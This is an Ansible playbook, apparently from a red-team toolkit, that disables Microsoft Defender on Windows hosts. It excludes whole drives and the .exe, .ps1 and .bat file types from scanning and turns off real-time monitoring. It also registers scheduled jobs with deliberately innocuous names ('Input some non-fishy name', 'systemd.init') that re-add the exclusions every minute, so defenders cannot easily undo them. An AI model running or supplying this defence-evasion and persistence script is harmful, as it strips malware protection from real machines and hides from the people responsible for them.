disable_defender.yaml

-
  name: Disable Defender
  hosts: windows
  strategy: free
  gather_facts: no
  tasks:
    - win_shell: Add-MpPreference -ExclusionPath C:\temp
      ignore_errors: yes
    - win_shell: Add-MpPreference -ExclusionPath C:\
      ignore_errors: yes
    - win_shell: Add-MpPreference -ExclusionPath C:\Windows
      ignore_errors: yes
    - win_shell: Add-MpPreference -ExclusionExtension .exe
      ignore_errors: yes
    - win_shell: Add-MpPreference -ExclusionExtension .ps1
      ignore_errors: yes
    - win_shell: Add-MpPreference -ExclusionExtension .bat
      ignore_errors: yes
    - win_shell: Register-ScheduledJob -Name 'Ensure AD connected' -ScriptBlock { Add-MpPreference -ExclusionPath C:\temp } -RunNow -RunEvery 00:01:00
      ignore_errors: yes
    - win_shell: Register-ScheduledJob -Name 'systemd.init' -ScriptBlock { Add-MpPreference -ExclusionPath C:\Windows } -RunNow -RunEvery 00:01:00
      ignore_errors: yes
    - win_shell: Register-ScheduledJob -Name 'Input some non-fishy name' -ScriptBlock { Add-MpPreference -ExclusionExtension .exe } -RunNow -RunEvery 00:01:00
      ignore_errors: yes
    - win_shell: Register-ScheduledJob -Name 'Windows startup jobs' -ScriptBlock { Add-MpPreference -ExclusionExtension .bat } -RunNow -RunEvery 00:01:00
      ignore_errors: yes
    - win_shell: Register-ScheduledJob -Name 'Disable malware' -ScriptBlock { Add-MpPreference -ExclusionExtension .ps1 } -RunNow -RunEvery 00:01:00
      ignore_errors: yes
    - win_shell: Register-ScheduledJob -Name 'Delete Red Team' -ScriptBlock { Add-MpPreference -ExclusionPath C:\ } -RunNow -RunEvery 00:01:00
      ignore_errors: yes
    - win_shell: Set-MpPreference -DisableRealtimeMonitoring $true
      ignore_errors: yes